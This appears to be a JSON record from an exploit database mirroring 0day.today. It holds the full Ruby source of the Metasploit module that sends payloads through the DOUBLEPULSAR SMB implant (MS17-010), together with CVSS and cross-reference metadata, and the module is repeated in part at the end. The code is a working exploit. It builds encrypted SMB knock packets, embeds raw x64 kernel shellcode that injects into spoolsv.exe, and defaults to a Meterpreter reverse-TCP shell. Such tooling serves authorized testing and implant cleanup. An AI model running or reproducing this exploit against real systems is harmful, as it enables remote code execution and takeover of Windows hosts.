'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-25] #"}, "lastseen": "2021-10-25T00:17:11", "differentElements": ["sourceData"], "edition": 55}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f841c957c58498d819128713153bbb6d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-26T08:21:53", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T08:21:53", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-26T08:21:53", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n 